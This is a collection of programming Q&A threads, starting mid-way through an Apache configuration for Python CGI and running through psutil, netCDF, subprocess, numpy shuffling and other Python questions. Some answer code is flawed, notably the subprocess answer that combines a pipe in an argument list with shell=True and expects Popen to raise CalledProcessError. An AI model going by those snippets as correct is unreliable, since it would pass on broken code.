libexec/apache2/mod_unique_id.so LoadModule setenvif_module libexec/apache2/mod_setenvif.so LoadModule version_module libexec/apache2/mod_version.so #LoadModule remoteip_module libexec/apache2/mod_remoteip.so LoadModule proxy_module libexec/apache2/mod_proxy.so LoadModule proxy_connect_module libexec/apache2/mod_proxy_connect.so LoadModule proxy_ftp_module libexec/apache2/mod_proxy_ftp.so LoadModule proxy_http_module libexec/apache2/mod_proxy_http.so LoadModule proxy_fcgi_module libexec/apache2/mod_proxy_fcgi.so LoadModule proxy_scgi_module libexec/apache2/mod_proxy_scgi.so #LoadModule proxy_fdpass_module libexec/apache2/mod_proxy_fdpass.so LoadModule proxy_wstunnel_module libexec/apache2/mod_proxy_wstunnel.so LoadModule proxy_ajp_module libexec/apache2/mod_proxy_ajp.so LoadModule proxy_balancer_module libexec/apache2/mod_proxy_balancer.so LoadModule proxy_express_module libexec/apache2/mod_proxy_express.so #LoadModule session_module libexec/apache2/mod_session.so #LoadModule session_cookie_module libexec/apache2/mod_session_cookie.so #LoadModule session_dbd_module libexec/apache2/mod_session_dbd.so LoadModule slotmem_shm_module libexec/apache2/mod_slotmem_shm.so #LoadModule slotmem_plain_module libexec/apache2/mod_slotmem_plain.so #LoadModule ssl_module libexec/apache2/mod_ssl.so #LoadModule dialup_module libexec/apache2/mod_dialup.so LoadModule lbmethod_byrequests_module libexec/apache2/mod_lbmethod_byrequests.so LoadModule lbmethod_bytraffic_module libexec/apache2/mod_lbmethod_bytraffic.so LoadModule lbmethod_bybusyness_module libexec/apache2/mod_lbmethod_bybusyness.so #LoadModule lbmethod_heartbeat_module libexec/apache2/mod_lbmethod_heartbeat.so LoadModule unixd_module libexec/apache2/mod_unixd.so #LoadModule heartbeat_module libexec/apache2/mod_heartbeat.so #LoadModule heartmonitor_module libexec/apache2/mod_heartmonitor.so #LoadModule dav_module libexec/apache2/mod_dav.so LoadModule status_module libexec/apache2/mod_status.so LoadModule autoindex_module libexec/apache2/mod_autoindex.so #LoadModule asis_module libexec/apache2/mod_asis.so #LoadModule info_module libexec/apache2/mod_info.so #LoadModule cgi_module libexec/apache2/mod_cgi.so #LoadModule dav_fs_module libexec/apache2/mod_dav_fs.so #LoadModule dav_lock_module libexec/apache2/mod_dav_lock.so #LoadModule vhost_alias_module libexec/apache2/mod_vhost_alias.so LoadModule negotiation_module libexec/apache2/mod_negotiation.so LoadModule dir_module libexec/apache2/mod_dir.so #LoadModule imagemap_module libexec/apache2/mod_imagemap.so #LoadModule actions_module libexec/apache2/mod_actions.so #LoadModule speling_module libexec/apache2/mod_speling.so LoadModule userdir_module libexec/apache2/mod_userdir.so LoadModule alias_module libexec/apache2/mod_alias.so #LoadModule rewrite_module libexec/apache2/mod_rewrite.so #LoadModule php5_module libexec/apache2/libphp5.so #LoadModule hfs_apple_module libexec/apache2/mod_hfs_apple.so <IfModule unixd_module> # # If you wish httpd to run as a different user or group, you must run # httpd as root initially and it will switch. # # User/Group: The name (or #number) of the user/group to run httpd as. # It is usually good practice to create a dedicated user and group for # running httpd, as with most system services. # User _www Group _www </IfModule> # 'Main' server configuration # # The directives in this section set up the values used by the 'main' # server, which responds to any requests that aren't handled by a # <VirtualHost> definition. These values also provide defaults for # any <VirtualHost> containers you may define later in the file. # # All of these directives may appear inside <VirtualHost> containers, # in which case these default settings will be overridden for the # virtual host being defined. # # # ServerAdmin: Your address, where problems with the server should be # e-mailed. This address appears on some server-generated pages, such # as error documents. e.g. [email protected] # ServerAdmin [email protected] # # ServerName gives the name and port that the server uses to identify itself. # This can often be determined automatically, but we recommend you specify # it explicitly to prevent problems during startup. # # If your host doesn't have a registered DNS name, enter its IP address here. # ServerName 127.0.0.1 # # Deny access to the entirety of your server's filesystem. You must # explicitly permit access to web content directories in other # <Directory> blocks below. # <Directory /> AllowOverride none Require all denied </Directory> # # Note that from this point forward you must specifically allow # particular features to be enabled - so if something's not working as # you might expect, make sure that you have specifically enabled it # below. # # # DocumentRoot: The directory out of which you will serve your # documents. By default, all requests are taken from this directory, but # symbolic links and aliases may be used to point to other locations. # DocumentRoot "/Library/WebServer/Documents" <Directory "/Library/WebServer/Documents"> # # Possible values for the Options directive are "None", "All", # or any combination of: # Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI MultiViews # # Note that "MultiViews" must be named *explicitly* --- "Options All" # doesn't give it to you. # # The Options directive is both complicated and important. Please see # http://httpd.apache.org/docs/2.4/mod/core.html#options # for more information. # Options FollowSymLinks Multiviews MultiviewsMatch Any # # AllowOverride controls what directives may be placed in .htaccess files. # It can be "All", "None", or any combination of the keywords: # AllowOverride FileInfo AuthConfig Limit # AllowOverride None # # Controls who can get stuff from this server. # Require all granted </Directory> # # DirectoryIndex: sets the file that Apache will serve if a directory # is requested. # <IfModule dir_module> DirectoryIndex index.html </IfModule> # # The following lines prevent .htaccess and .htpasswd files from being # viewed by Web clients. # <FilesMatch "^\.([Hh][Tt]|[Dd][Ss]_[Ss])"> Require all denied </FilesMatch> # # Apple specific filesystem protection. # <Files "rsrc"> Require all denied </Files> <DirectoryMatch ".*\.\.namedfork"> Require all denied </DirectoryMatch> # # ErrorLog: The location of the error log file. # If you do not specify an ErrorLog directive within a <VirtualHost> # container, error messages relating to that virtual host will be # logged here. If you *do* define an error logfile for a <VirtualHost> # container, that host's errors will be logged there and not here. # ErrorLog "/private/var/log/apache2/error_log" # # LogLevel: Control the number of messages logged to the error_log. # Possible values include: debug, info, notice, warn, error, crit, # alert, emerg. # LogLevel warn <IfModule log_config_module> # # The following directives define some format nicknames for use with # a CustomLog directive (see below). # LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined LogFormat "%h %l %u %t \"%r\" %>s %b" common <IfModule logio_module> # You need to enable mod_logio.c to use %I and %O LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio </IfModule> # # The location and format of the access logfile (Common Logfile Format). # If you do not define any access logfiles within a <VirtualHost> # container, they will be logged here. Contrariwise, if you *do* # define per-<VirtualHost> access logfiles, transactions will be # logged therein and *not* in this file. # CustomLog "/private/var/log/apache2/access_log" common # # If you prefer a logfile with access, agent, and referer information # (Combined Logfile Format) you can use the following directive. # #CustomLog "/private/var/log/apache2/access_log" combined </IfModule> <IfModule alias_module> # # Redirect: Allows you to tell clients about documents that used to # exist in your server's namespace, but do not anymore. The client # will make a new request for the document at its new location. # Example: # Redirect permanent /foo http://www.example.com/bar # # Alias: Maps web paths into filesystem paths and is used to # access content that does not live under the DocumentRoot. # Example: # Alias /webpath /full/filesystem/path # # If you include a trailing / on /webpath then the server will # require it to be present in the URL. You will also likely # need to provide a <Directory> section to allow access to # the filesystem path. # # ScriptAlias: This controls which directories contain server scripts. # ScriptAliases are essentially the same as Aliases, except that # documents in the target directory are treated as applications and # run by the server when requested rather than as documents sent to the # client. The same rules about trailing "/" apply to ScriptAlias # directives as to Alias. # #ScriptAliasMatch ^/cgi-bin/((?!(?i:webobjects)).*$) "/Library/WebServer/CGI-Executables/$1" #ScriptAlias /cgi-bin/ "/Users/daniele/Sites/cgi-bin/" </IfModule> <IfModule cgid_module> # # ScriptSock: On threaded servers, designate the path to the UNIX # socket used to communicate with the CGI daemon of mod_cgid. # #Scriptsock cgisock </IfModule> # # "/Library/WebServer/CGI-Executables" should be changed to whatever your ScriptAliased # CGI directory exists, if you have that configured. # <Directory "/Library/WebServer/CGI-Executables"> AllowOverride None Options None Require all granted </Directory> #<Directory "/Users/daniele/Sites/cgi-bin/"> # AllowOverride None # Options ExecCGI # AddHandler cgi-script .cgi .pl .tcl # Order allow,deny # Allow from all #</Directory> <IfModule mime_module> # # TypesConfig points to the file containing the list of mappings from # filename extension to MIME-type. # TypesConfig /private/etc/apache2/mime.types # # AddType allows you to add to or override the MIME configuration # file specified in TypesConfig for specific file types. # #AddType application/x-gzip .tgz # # AddEncoding allows you to have certain browsers uncompress # information on the fly. Note: Not all browsers support this. # #AddEncoding x-compress .Z #AddEncoding x-gzip .gz .tgz # # If the AddEncoding directives above are commented-out, then you # probably should define those extensions to indicate media types: # AddType application/x-compress .Z AddType application/x-gzip .gz .tgz # # AddHandler allows you to map certain file extensions to "handlers": # actions unrelated to filetype. These can be either built into the server # or added with the Action directive (see below) # # To use CGI scripts outside of ScriptAliased directories: # (You will also need to add "ExecCGI" to the "Options" directive.) # #AddHandler cgi-script .cgi # For type maps (negotiated resources): #AddHandler type-map var # # Filters allow you to process content before it is sent to the client. # # To parse .shtml files for server-side includes (SSI): # (You will also need to add "Includes" to the "Options" directive.) # #AddType text/html .shtml #AddOutputFilter INCLUDES .shtml </IfModule> # # The mod_mime_magic module allows the server to use various hints from the # contents of the file itself to determine its type. The MIMEMagicFile # directive tells the module where the hint definitions are located. # #MIMEMagicFile /private/etc/apache2/magic # # Customizable error responses come in three flavors: # 1) plain text 2) local redirects 3) external redirects # # Some examples: #ErrorDocument 500 "The server made a boo boo." #ErrorDocument 404 /missing.html #ErrorDocument 404 "/cgi-bin/missing_handler.pl" #ErrorDocument 402 http://www.example.com/subscription_info.html # # # MaxRanges: Maximum number of Ranges in a request before # returning the entire resource, or one of the special # values 'default', 'none' or 'unlimited'. # Default setting is to accept 200 Ranges. #MaxRanges unlimited # # EnableMMAP and EnableSendfile: On systems that support it, # memory-mapping or the sendfile syscall may be used to deliver # files. This usually improves server performance, but must # be turned off when serving from networked-mounted # filesystems or if support for these functions is otherwise # broken on your system. # Defaults: EnableMMAP On, EnableSendfile Off # #EnableMMAP off #EnableSendfile on TraceEnable off # Supplemental configuration # # The configuration files in the /private/etc/apache2/extra/ directory can be # included to add extra features or to modify the default configuration of # the server, or you may simply copy their contents here and change as # necessary. # Server-pool management (MPM specific) Include /private/etc/apache2/extra/httpd-mpm.conf # Multi-language error messages #Include /private/etc/apache2/extra/httpd-multilang-errordoc.conf # Fancy directory listings Include /private/etc/apache2/extra/httpd-autoindex.conf # Language settings #Include /private/etc/apache2/extra/httpd-languages.conf # User home directories Include /private/etc/apache2/extra/httpd-userdir.conf # Real-time info on requests and configuration #Include /private/etc/apache2/extra/httpd-info.conf # Virtual hosts #Include /private/etc/apache2/extra/httpd-vhosts.conf # Local access to the Apache HTTP Server Manual #Include /private/etc/apache2/extra/httpd-manual.conf # Distributed authoring and versioning (WebDAV) #Include /private/etc/apache2/extra/httpd-dav.conf # Various default settings #Include /private/etc/apache2/extra/httpd-default.conf # Configure mod_proxy_html to understand HTML4/XHTML1 <IfModule proxy_html_module> Include /private/etc/apache2/extra/proxy-html.conf </IfModule> # Secure (SSL/TLS) connections #Include /private/etc/apache2/extra/httpd-ssl.conf # # Note: The following must must be present to support # starting without SSL on platforms with no /dev/random equivalent # but a statically compiled-in mod_ssl. # <IfModule ssl_module> SSLRandomSeed startup builtin SSLRandomSeed connect builtin </IfModule> Include /private/etc/apache2/other/*.conf # # uncomment out the below to deal with user agents that deliberately # violate open standards by misusing DNT (DNT *must* be a specific # end-user choice) # #<IfModule setenvif_module> #BrowserMatch "MSIE 10.0;" bad_DNT #</IfModule> #<IfModule headers_module> #RequestHeader unset DNT env=bad_DNT #</IfModule> * /etc/apache2/users/daniele.conf ScriptAlias /cgi-bin/ "/Users/daniele/Sites/cgi-bin/" <Directory "/Users/daniele/Sites/cgi-bin/"> AllowOverride None Options ExecCGI AddHandler cgi-script .cgi .pl .tcl Order allow,deny Allow from all </Directory> <Directory "/Users/daniele/Sites/"> AllowOverride All Options Indexes MultiViews FollowSymLinks Require all granted </Directory> * /etc/apache2/extra/httpd-userdir.conf # Settings for user home directories # # Required module: mod_authz_core, mod_authz_host, mod_userdir # # UserDir: The name of the directory that is appended onto a user's home # directory if a ~user request is received. Note that you must also set # the default access control for these directories, as in the example below. # UserDir Sites # # Control access to UserDir directories. The following is an example # for a site where these directories are restricted to read-only. # Include /private/etc/apache2/users/*.conf <IfModule bonjour_module> RegisterUserSite customized-users </IfModule> These are the simple html and python code I'm trying to execute: * /Users/daniele/Sites/prova_cgi.html <HTML> <HEAD> <TITLE>PROVOLA</TITLE> </HEAD> <BODY> <form action="cgi-bin/provola.py" method="POST"> <fieldset> <legend>Personal information:</legend> First name:<br> <input type="text" name="firstname" value="Mickey"><br> Last name:<br> <input type="text" name="lastname" value="Mouse"> <br><br> <input type="submit" value="Submit"></fieldset> </form> </BODY> </HTML> * /Users/daniele/Sites/cgi-bin/provola.py #!/usr/bin/python def main(): print "Content-type: text/html" print print "<html><head>" print "" print "</head><body>" print "Test Page" print "</body></html>" return 0 if __name__ == '__main__': main() Any tips? Thanks in advance. Answer: Try: <Directory "/Users/daniele/Sites/cgi-bin/"> AllowOverride None Options ExecCGI AddHandler cgi-script .cgi .pl .tcl .py Order allow,deny Allow from all </Directory> Mind the `.py` I added w.r.t. to your quoted setup. The `AddHandler` directive tells apache which files to treat as scripts, rather than simply "content". In your current setup you're missing python scripts. See: <https://httpd.apache.org/docs/current/howto/cgi.html>
Memory usage of a single process with psutil in python (in byte) Question: How to get the amount of memory which has been used by a single process in windows platform with psutil library? (I dont want to have the percentage , I want to know the amount in bytes) We can use: psutil.virtual_memory().used To find the memory usage of the whole OS in bytes, but how about each single process? Thanks, Answer: Call [`memory_info_ex`](https://pythonhosted.org/psutil/#psutil.Process.memory_info_ex): >>> import psutil >>> p = psutil.Process() >>> p.name() 'python.exe' >>> _ = p.memory_info_ex() >>> _.wset, _.pagefile (11665408, 8499200) The [working set](http://msdn.microsoft.com/en- us/library/windows/desktop/cc441804%28v=vs.85%29.aspx) includes pages that are shared or shareable by other processes, so in the above example it's actually larger than the paging file commit charge. There's also a simpler `memory_info` method. This returns `rss` and `vms`, which correspond to `wset` and `pagefile`. >>> p.memory_info() pmem(rss=11767808, vms=8589312) * * * For another example, let's map some shared memory. >>> import mmap >>> m = mmap.mmap(-1, 10000000) >>> p.memory_info() pmem(rss=11792384, vms=8609792) The mapped pages get demand-zero faulted into the working set. >>> for i in range(0, len(m), 4096): m[i] = 0xaa ... >>> p.memory_info() pmem(rss=21807104, vms=8581120) A private copy incurs a paging file commit charge: >>> s = m[:] >>> p.memory_info() pmem(rss=31830016, vms=18604032)
Python, how to slice a netcdf file. Question: I am trying to slice a variable from a netcdf file and plot it but I am running into problems. This is from my code: import numpy as np from netCDF4 import Dataset Raw= "filename.nc" data = Dataset(Raw) u=data.variables['u'][:,:,:,:] print u.shape U=u([0,0,[200:500],[1:300]]) #The print statement yields (2, 17, 900, 2600) as u's dimensions. #U Is the slice of the dataset I am interested inn. A small subset of the 4-dimensional vector. This last line of code gives me a syntax error and I cannot figure out why. Trying to pick out a single value from the array ( u(0,0,0,1)) gives me an Type error: TypeError: 'MaskedArray' The program's aim is to perform simple algebra on a subset of this subset and to plot this data. Any help is appreciated. Answer: I think the comment by Spencer Hill is correct. Without seeing the full error message, I can't be sure, but I'm pretty sure that the `TypeError` results from you (through the use of parenthesis) trying to call the array as a function. Try: ` U=u[0,0,200:500,1:300] `
execute robot keyword from python using robotframework api Question: Writing complex robot keywords in robot language is sometimes very time consuming because robot language is not a real programming language. I would like to write my keywords in python and only expose simple html tables in robotframework language. The problem is that we already have a lot of low level robot keywords written in robot language (in .robot and .txt files). Is it possible to execute those keywords from the python code using the robotframework python api ? Answer: Yes, it is possible. In your python code you can get a reference to the BuiltIn library, and then use the Run Keyword keyword to run any keyword you want. For example, you could write a python keyword that takes another keyword as an argument and runs it. The following might be how you do it in python: # MyLibrary.py from robot.libraries.BuiltIn import BuiltIn def call_keyword(keyword): return BuiltIn().run_keyword(keyword) You can then tell this keyword to call any other keyword. Here's an example suite that has a keyword written in robot,, and then has the python code execute it: *** Settings *** | Library | MyLibrary.py *** Keywords *** | Example keyword | | log | hello, world *** Test Cases *** | Example of calling a python keyword that calls a robot keyword | | Call keyword | Example keyword Notice how the test case tells the `call_keyword` method to run the keyword `Example Keyword`. Of course, you don't _have_ to pass in a keyword. The key point is to get a reference to the BuiltIn library, which then allows you to call any method in that library. This is documented in the robot framework user guide, in the section titled [Using Robot Framework's Internal Modules](http://robotframework.org/robotframework/latest/RobotFrameworkUserGuide.html#using- robot-framework-s-internal-modules). More specifically, see the section [Using BuiltIn Library](http://robotframework.org/robotframework/latest/RobotFrameworkUserGuide.html#using- builtin-library). Note that the documentation states you need to call register_run_keyword if your keyword calls the `run_keyword` method. I won't reproduce the documentation here. You can get the documentation by looking in the BuiltIn module itself, or run the following code in an interactive python session: >>> import robot.libraries.BuiltIn >>> help(robot.libraries.BuiltIn.register_run_keyword)
send a file to multiple device at same time via python&bluez Question: i want send a file to multiple device at same time via python ... my code : import bluetooth from lightblue import * import select import threading def send(fileaddress,bladdress,pushport): client = obex.OBEXClient(bladdress, pushport) client.connect() client.put({"name": "test"}, open(fileaddress)) def StartSend(fileaddress,bladdress,pushport): t=threading.Thread(group=None,target=send, name=None, args=(fileaddress,bladdress,pushport)) t.daemon=True t.start() t.join() class MyDiscoverer(bluetooth.DeviceDiscoverer): def pre_inquiry(self): self.done = False def device_discovered(self, addr, device_class, name): print "%s - %s" % (addr, name) serv = bluetooth.find_service(name="OBEX Object Push", uuid=None, address=None) pushport = serv[0]['port'] StartSend('/home/abbas/Desktop/eclipse-standard-kepler-SR2-linux-gtk.tar.gz', addr, pushport) def inquiry_complete(self): self.done = True if __name__ == '__main__': d = MyDiscoverer() d.find_devices(lookup_names = True) readfiles = [ d, ] while True: rfds = select.select( readfiles, [], [] )[0] if d in rfds: d.process_event() if d.done: break but when first device detect and start send file to it all python script paused and wait that sending finish and next start to send another device ... why ? i use thread so why pause python process in send step ? i use this site for these code : <http://people.csail.mit.edu/albert/bluez- intro/x339.html> To asynchronously detect nearby bluetooth devices, create a subclass of DeviceDiscoverer and override the pre_inquiry, device_discovered, and inquiry_complete methods. To start the discovery process, invoke find_devices, which returns immediately. pre_inquiry is called immediately before the actual inquiry process begins, and inquiry_complete is called as soon as the process completes. MyDiscoverer exposes a fileno method, which allows it to be used with the select module. This provides a way for a single thread of control to wait for events on many open files at once, and greatly simplifies event-driven programs. Call process_event to have the DeviceDiscoverer process pending events, which can be either a discovered device or the inquiry completion. When a nearby device is detected, device_discovered is invoked, with the address and device class of the detected device. If lookup_names was set in the call to find_devices, then name will also be set to the user-friendly name of the device. For more information about device classes Answer: The problem is that the `StartSend` function joins the thread, which waits for the thread to finish. So, creating the thread was pointless. Try using `multiprocessing.ThreadPool` instead. Its not well documented but works the same as `multiprocessing.Pool`.
import a python module whose location is unknown Question: I would like to import a function (function.py) from a given module in python (MOD.py), whose location I do not know. For it, I have performed two steps: First step, I get the path to the directory that contains the module: path = subprocess.check_output(['find', 'home/scripts','-iname','MOD.py','|','sed','s/\/MOD.py//g']).rstrip() Secondly, I point at this directory to get the function from the module: sys.path.insert(0,'{0}'.format(path)) from MOD import function The code written is failing in the first step, particularly in the sed. Why is it not working? Is there a clearer way to do the first step? Is it necessary to do two steps, or is it possible to do it with one python instruction? Thanks! Answer: First note that you could not use pipe like that ! for using `pipe` you have to pass `shell=True` so instead of `check_output` use `Popen`, also your code failed in `path` argument of `find` add a `/` before home . If the executed command returns a nonzero exit code, an exception is raised. you can use a `try-except` with `subprocess.CalledProcessError` to catch errors and getting the output created along with the exit code : import subprocess try: ps = subprocess.Popen(['find', '/home/scripts','-iname','MOD.py','|','sed','s/\/MOD.py//g'],shell=True,stdout=subprocess.PIPE,stderr=subprocess.STDOUT) path= ps.communicate()[0] except subprocess.CalledProcessError as e: out_bytes = e.output code= e.returncode in addition as a more secure method i suggest don't use `shell=True` instead use tow command : ps = subprocess.Popen(['find', '/home/scripts','-iname','MOD.py'], stdout=subprocess.PIPE) path = subprocess.check_output(['sed','s/\/MOD.py//g'], stdin=ps.stdout)
Convert following data to JSON format in python Question: I have a file with following content which is generated by some other program. Please note that each one has a new line character at the end. {'a':1,'b':534} {'a':4,'b':882} {'a':2,'b':964} . . so on... How do I convert this into valid JSON format? The above should be printed something like this { "Sale": [ { "a": 1, "b": 534 }, { "a": 4, "b": 882 }, { "a": 2, "b": 964 } ] } I can do it in JQuery but I need to do this in python as i am not good at python but i need to make it runnable through bash script hence the need to make it to a python script. I am gonna share the jquery solution just in case you need to refer. result = replaceAll(result,"'","\""); result = replaceAll(result,"}, {",","); result = replaceAll(result,"}{","},{"); result = replaceAll(result,"}\n{","},{"); result = "{\"Sale\":["+result+"]}"; //alert(result); replaceAll function is function replaceAll(str, find, replace) { var i = str.indexOf(find); if (i > -1){ str = str.replace(find, replace); i = i + replace.length; var st2 = str.substring(i); if(st2.indexOf(find) > -1){ str = str.substring(0,i) + replaceAll(st2, find, replace); } } return str; } The above works but i need a python alternative to this. Answer: from ast import literal_eval with open('data.txt') as f: sale = [literal_eval(line) for line in f] data = {'Sale': sale} print(data) Output {'Sale': [{'a': 1, 'b': 534}, {'a': 4, 'b': 882}, {'a': 2, 'b': 964}]} From there, you can use the [`json` library](https://docs.python.org/2/library/json.html) to write this to file in JSON format. import json json.dumps(data, indent=4)
Python word in file change Question: I am trying to change the words that are nouns in a text to "noun". I am having trouble. Here is what I have so far. def noun(file): for word in file: for ch in word: if ch[-1:-3] == "ion" or ch[-1:-3] == "ism" or ch[-1:-3] == "ity": word = "noun" if file(word-1) == "the" and (file(word+1)=="of" or file(word+1) == "on" word = "noun" # words that appear after the return outfile Any ideas? Answer: Your slices are empty: >>> 'somethingion'[-1:-3] '' because the endpoint lies before the start. You could just use `[-3:]` here: >>> 'somethingion'[-3:] 'ion' But you'd be better of using [`str.endswith()`](https://docs.python.org/2/library/stdtypes.html#str.endswith) instead: ch.endswith(("ion", "ism", "ity")) The function will return `True` if the string ends with any of the 3 given strings. Not that `ch` is actually a word; if `word` is a string, then `for ch in word` iterates over _individual characters_ , and those are never going to end in 3-character strings, being only one character long themselves. Your attempts to look at the next and previous words are also going to fail; you cannot use a list or file object as a callable, let alone use `file(word - 1)` as a meaningful expression (a string `- 1` fails, as well as `file(...)`). Instead of looping over the 'word', you could use a regular expression here: import re nouns = re.compile(r'(?<=\bthe\b)(\s*\w+(?:ion|ism|ity)\s*)(?=\b(?:of|on)\b)') some_text = nouns.sub(' noun ', some_text) This looks for words ending in your three substrings, but only if preceded by `the` and followed by `of` or `on` and replaces those with `noun`. Demo: >>> import re >>> nouns = re.compile(r'(?<=\bthe\b)(\s*\w+(?:ion|ism|ity)\s*)(?=\b(?:of|on)\b)') >>> nouns.sub(' noun ', 'the scion on the prism of doom') 'the noun on the noun of doom'
Meaning of Stanford Spanish POS Tagger tags Question: I am tagging Spanish text with the Stanford POS Tagger (via NLTK in Python). Here is my code: import nltk from nltk.tag.stanford import POSTagger spanish_postagger = POSTagger('models/spanish.tagger', 'stanford-postagger.jar') spanish_postagger.tag('esta es una oracion de prueba'.split()) The result is: [(u'esta', u'pd000000'), (u'es', u'vsip000'), (u'una', u'di0000'), (u'oracion', u'nc0s000'), (u'de', u'sp000'), (u'prueba', u'nc0s000')] I want to know where can I found what exactly means pd000000, vsip000, di0000, nc0s000, sp000? Answer: This is a simplified version of the tagset used in the **[AnCora treebank](http://clic.ub.edu/corpus/en)**. You can find their tagset documentation here: <http://nlp.lsi.upc.edu/freeling/doc/tagsets/tagset- es.html> The "simplification" consists of nulling out many of the final fields which don't strictly belong in a part-of-speech tag. For example, our part-of-speech tagger will always give you null (`0`) values for the NER field of the original tagset (see [EAGLES noun documentation](http://nlp.lsi.upc.edu/freeling/doc/tagsets/tagset- es.html#nombres)). In short: **the fields in the POS tags produced by our tagger correspond exactly to AnCora POS fields, but a lot of those fields will be null**. For most practical purposes you'll only need to look at the first 2–4 characters of the tag. The first character always indicates the broad POS category, and the second character indicates some kind of subtype. * * * We're in the process of writing some introductory documentation for using Spanish with CoreNLP (that means understanding these tags, and much else) right now. For the moment, you can find more information on the first page of our [technical documentation](https://docs.google.com/document/d/1lI- ie4-GGx2IA6RJNc0PMb3CHDoNQMUa0gj0eQEDYQ0/edit?usp=sharing).
Django Gunicorn ImportError: No module named django.core.wsgi Question: I have created a Django application but now have plans to use some asynchronous (real-time) functionality in some areas of the site. After doing some research I think I should use `gevent-socketio` and therefore it is required I switch the application server to `Gunicorn`. I have fallen at the first hurdle of deploying `Gunicorn`, I have installed with the command `sudo apt-get install gunicorn` and try to run my application with `gunicorn project.wsgi:application` but it fails and produces the following error: Traceback (most recent call last): File "/usr/lib/python2.7/dist-packages/gunicorn/arbiter.py", line 473, in spawn_worker worker.init_process() File "/usr/lib/python2.7/dist-packages/gunicorn/workers/base.py", line 100, in init_process self.wsgi = self.app.wsgi() File "/usr/lib/python2.7/dist-packages/gunicorn/app/base.py", line 115, in wsgi self.callable = self.load() File "/usr/lib/python2.7/dist-packages/gunicorn/app/wsgiapp.py", line 33, in load return util.import_app(self.app_uri) File "/usr/lib/python2.7/dist-packages/gunicorn/util.py", line 362, in import_app __import__(module) File "/home/alex/django_projects/fantasymatchday_1/fantasymatchday_1/wsgi.py", line 13, in <module> from django.core.wsgi import get_wsgi_application ImportError: No module named django.core.wsgi 2014-11-20 17:31:45 [6605] [INFO] Worker exiting (pid: 6605) 2014-11-20 17:31:45 [6600] [INFO] Shutting down: Master 2014-11-20 17:31:45 [6600] [INFO] Reason: Worker failed to boot. Can anybody give me a clue to what I need to do from here? **I am using python 3.4.0 and Django 1.6** Answer: You have to install `django` and `gunicorn` in the same environment. If you use `virtualenv` make sure you have both in the same virtual environment.
Uniformly shuffle 5 gigabytes of numpy data Question: I'm training a neural network with about five gigabytes of data stored as `numpy` arrays. The data are split into chunks of 100000 rows, and I've done six cycles of training over all the chunks in a random order. Unfortunately, the network has begun to overfit. I think it still has capacity to fit the data more closely; my suspicion is that internal regularities within each chunk are starting to contradict one another, and I need to shuffle the data more thoroughly so that it can train on different combinations. I want to try this before going to the trouble of getting more training data. Does anyone know a good way to generate a new permutation of 3.6 million (very long) rows of numpy data? I thought about using [one of these](http://stackoverflow.com/questions/19304279/how-to-shuffle-a-text-file- on-disk-in-python) techniques, but writing these arrays using `numpy.savetxt` produces _unbelievably_ huge files, and I can't tell how to manipulate individual rows from a standard `npy` file in a way that helps to solve this problem. Right now, my best idea is to create a permutation of paired indices `(c, r)` into the data, where `c` choses a chunk and `r` choses a row from that chunk. I could store each row in a new preallocated array, and then save it. But I wonder if there's a less horribly I/O-bound solution. Is there some principled way to shuffle random pairs of chunks together until you get a permutation that's statistically independent from the starting permutation? Answer: Among the things I've tried so far, a PyTables solution is currently the best, followed by a solution that uses `numpy`'s support for memmapped arrays. The PyTables solution is not straightforward though. If you use a shuffled array of integers to directly index a PyTables array, it's very slow. Much faster is the following two-step process: 1. Select a random subset of the array using a boolean index array. _This must be done in a chunkwise fashion_. If you pass the index array directly to the PyTables array, it's slow. * Preallocate a numpy array and create a list of slices that split the PyTables array into chunks. * Read each chunk _entirely_ into memory, and then use the corresponding chunk of the index array to select the correct values for that chunk. * Store the selected values in the preallocated array. 2. _Then_ shuffle the preallocated array. This process produces a permutation as random as a normal shuffling process would. If that doesn't seem obvious, consider this: `(n choose x) * x! = x! * n! / (x! * (n - x)!) = n! / (n - x)!`. This method is fast enough to do a shuffle-on-load for every training cycle. It's also able to compress the data down to ~650M -- nearly a 90% deflation. Here's my current implementation; this is called once for every training chunk in the corpus. (The returned arrays are shuffled elsewhere.) def _h5_fast_bool_ix(self, h5_array, ix, read_chunksize=100000): '''Iterate over an h5 array chunkwise to select a random subset of the array. `h5_array` should be the array itself; `ix` should be a boolean index array with as many values as `h5_array` has rows; and you can optionally set the number of rows to read per chunk with `read_chunksize` (default is 100000). For some reason this is much faster than using `ix` to index the array directly.''' n_chunks = h5_array.shape[0] / read_chunksize slices = [slice(i * read_chunksize, (i + 1) * read_chunksize) for i in range(n_chunks)] a = numpy.empty((ix.sum(), h5_array.shape[1]), dtype=float) a_start = 0 for sl in slices: chunk = h5_array[sl][ix[sl]] a_end = a_start + chunk.shape[0] a[a_start:a_end] = chunk a_start = a_end return a It's somewhat crazy to me that an O(n^2) approach (iterating over the entire PyTables array for every chunk) is faster in this case than an O(n) approach (randomly selecting each row in one pass). But hey, it works. With a bit more indirection, this could be adapted for loading arbitrary non-random permutations, but that adds more complexity than it's worth here. The `mmap` solution is here for reference, for those people who need a pure numpy solution for whatever reason. It shuffles all the data in about 25 minutes, while the above solution manages the same in less than half that time. This should scale linearly too, because `mmap` allows (relatively) efficient random access. import numpy import os import random X = [] Y = [] for filename in os.listdir('input'): X.append(numpy.load(os.path.join('input', filename), mmap_mode='r')) for filename in os.listdir('output'): Y.append(numpy.load(os.path.join('output', filename), mmap_mode='r')) indices = [(chunk, row) for chunk, rows in enumerate(X) for row in range(rows.shape[0])] random.shuffle(indices) newchunks = 50 newchunksize = len(indices) / newchunks for i in range(0, len(indices), newchunksize): print i rows = [X[chunk][row] for chunk, row in indices[i:i + newchunksize]] numpy.save('X_shuffled_' + str(i), numpy.array(rows)) rows = [Y[chunk][row] for chunk, row in indices[i:i + newchunksize]] numpy.save('Y_shuffled_' + str(i), numpy.array(rows))
How to use java libraries in python processing Question: Im using processing in python mode but I want to use the processing library sound. But I dont know how to import this into my program in python syntax. In java its like this: Import processing.sound.*; Thanks Answer: You can use `add_library(processing.sound)`. I used it with g4p library
